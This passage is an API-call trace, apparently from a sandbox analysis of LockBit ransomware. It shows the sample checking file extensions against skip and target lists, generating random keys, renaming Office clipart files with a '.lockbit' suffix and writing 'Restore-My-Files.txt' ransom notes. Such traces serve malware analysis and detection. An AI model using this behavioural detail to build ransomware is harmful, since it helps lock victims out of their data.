lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.824] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.824] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL01040_.WMF") returned -1 [0173.824] lstrcmpiW (lpString1="ntldr", lpString2="SL01040_.WMF") returned -1 [0173.824] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL01040_.WMF") returned -1 [0173.825] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL01040_.WMF") returned -1 [0173.825] lstrcmpiW (lpString1="autorun.inf", lpString2="SL01040_.WMF") returned -1 [0173.825] lstrcmpiW (lpString1="thumbs.db", lpString2="SL01040_.WMF") returned 1 [0173.825] lstrcmpiW (lpString1="iconcache.db", lpString2="SL01040_.WMF") returned -1 [0173.825] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.825] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01040_.WMF") returned=".WMF" [0173.825] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.825] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.825] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.826] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.826] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.826] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.826] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.826] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.826] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01040_.WMF.lockbit") returned 72 [0173.826] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01040_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01040_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.827] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.827] malloc (_Size=0x40068) returned 0x3df0008 [0173.827] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3292) returned 1 [0173.827] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.827] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0173.827] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.828] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0173.828] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0173.829] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01040_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01040_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.829] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.830] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.831] free (_Block=0x1fa2ed8) [0173.831] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01040_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.831] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.831] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.831] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1573e300, ftCreationTime.dwHighDateTime=0x1bd4bfc, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1573e300, ftLastWriteTime.dwHighDateTime=0x1bd4bfc, nFileSizeHigh=0x0, nFileSizeLow=0x60c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL01041_.WMF", cAlternateFileName="")) returned 1 [0173.831] lstrcmpiW (lpString1=".", lpString2="SL01041_.WMF") returned -1 [0173.831] lstrcmpiW (lpString1="..", lpString2="SL01041_.WMF") returned -1 [0173.831] PathFindExtensionW (pszPath="SL01041_.WMF") returned=".WMF" [0173.831] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.831] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.832] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.832] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL01041_.WMF") returned -1 [0173.833] lstrcmpiW (lpString1="ntldr", lpString2="SL01041_.WMF") returned -1 [0173.833] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL01041_.WMF") returned -1 [0173.833] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL01041_.WMF") returned -1 [0173.833] lstrcmpiW (lpString1="autorun.inf", lpString2="SL01041_.WMF") returned -1 [0173.833] lstrcmpiW (lpString1="thumbs.db", lpString2="SL01041_.WMF") returned 1 [0173.833] lstrcmpiW (lpString1="iconcache.db", lpString2="SL01041_.WMF") returned -1 [0173.833] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.833] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01041_.WMF") returned=".WMF" [0173.833] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.833] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.833] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.834] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.834] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01041_.WMF.lockbit") returned 72 [0173.834] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01041_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01041_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0173.835] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.835] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.835] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1548) returned 1 [0173.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.836] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.840] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01041_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01041_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.840] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.840] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.841] free (_Block=0x1fa2ed8) [0173.841] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01041_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.841] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.841] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.842] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd76600, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7cd76600, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x1b04, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL01394_.WMF", cAlternateFileName="")) returned 1 [0173.842] lstrcmpiW (lpString1=".", lpString2="SL01394_.WMF") returned -1 [0173.842] lstrcmpiW (lpString1="..", lpString2="SL01394_.WMF") returned -1 [0173.842] PathFindExtensionW (pszPath="SL01394_.WMF") returned=".WMF" [0173.842] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.842] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.843] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.843] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL01394_.WMF") returned -1 [0173.844] lstrcmpiW (lpString1="ntldr", lpString2="SL01394_.WMF") returned -1 [0173.844] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL01394_.WMF") returned -1 [0173.844] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL01394_.WMF") returned -1 [0173.844] lstrcmpiW (lpString1="autorun.inf", lpString2="SL01394_.WMF") returned -1 [0173.844] lstrcmpiW (lpString1="thumbs.db", lpString2="SL01394_.WMF") returned 1 [0173.844] lstrcmpiW (lpString1="iconcache.db", lpString2="SL01394_.WMF") returned -1 [0173.844] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.844] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01394_.WMF") returned=".WMF" [0173.844] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.844] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.844] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.845] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.845] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01394_.WMF.lockbit") returned 72 [0173.845] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01394_.WMF" (normalized: "c:\\program files\\microsoft 